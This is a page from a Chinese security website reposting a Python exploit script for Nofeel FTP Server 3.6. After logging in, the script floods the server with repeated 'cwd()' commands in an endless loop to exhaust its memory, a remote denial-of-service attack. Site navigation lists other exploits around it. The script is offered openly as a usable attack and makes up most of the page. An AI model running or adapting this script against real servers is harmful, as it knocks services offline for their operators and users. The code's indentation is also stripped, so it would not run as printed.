首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nofeel FTP Server 3.6 (CWD) Remote Memory Consumption Exploit
来源:www.snakespc.com 作者:His0k4 发布时间:2009-01-14  
#!/usr/bin/python
#          
#                  ------  |      ______ _____   (--, __*__  ______
#                  |____|  |      |    | |       | ! )  |    |     |
#                [ |    |` |      | <> | |-----> |__/   |    |     | ]
#                  | .. |  |____! |____| |____   |\     |    |-----|
#                                      |        _| \  -----  | ::: |
#                                      |         |  \
#                                |_____|         |   \
#                                                |
#                                                |
#                                               ,|.
#                                              / | \
#                                             |  |  |
#                                             |  _  |
#                                           `._\/.\/_,'
#                                             _( 8 )_
#                                            / '_ _' \
#                                           |  /{_}\  |
#                                           ` |  "  | `
#                                             |     |
#
#
# [+] Application : Nofeel FTP Server V3.6
#
# [+] Vendor URL : http://www.nftpserver.com/
#
# [+] Bug : Nofeel FTP Server (CWD) Remote Memory Consumption Exploit
#
# [+] Author : His0k4
#
# [+] Greetings : All friends & Muslims Hackers (dz)
# www.snakespc.com
#---------------------------------------------------------------------------------

import socket
import struct
import time

try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\n[*] Nofeel FTP Server Remote Memory Consumption Exploit"
print "[*] Author:  His0k4\r\n"
connect=s.connect(('127.0.0.1',21))
s.recv(1024)
print "[*] Sending Username"
time.sleep(1)
s.send('USER test\r\n')
s.recv(1024)
print "[+] Sending Password"
time.sleep(1)
s.send('PASS ftp\r\n')
s.recv(1024)
print "[*] Sending evil command"
time.sleep(1)
while (1):
s.send('cwd()\r\n')
s.recv(1024)
s.send('quit\r\n')
s.recv(1024)
except:
print "Can't connect to ftp"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PowerPoint Viewer OCX 3.1 Remo
·Word Viewer OCX 3.2 Remote Fil
·>HSPell 1.1 (cilla.cgi) Remote
·Ciansoft PDFBuilderX version 2
·>HSPell 1.1 (cilla.cgi) Remote
·Denial of service exploit that
·dBpowerAMP Audio Player 2 .PLS
·TeamSpeak <= 2.0.23.17 Remote
·PowerPoint Viewer OCX 3.1 Remo
·EDraw Office Viewer 5.4 HttpDo
·Office Viewer ActiveX Control
·Cisco VLAN Trunking Protocol D
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved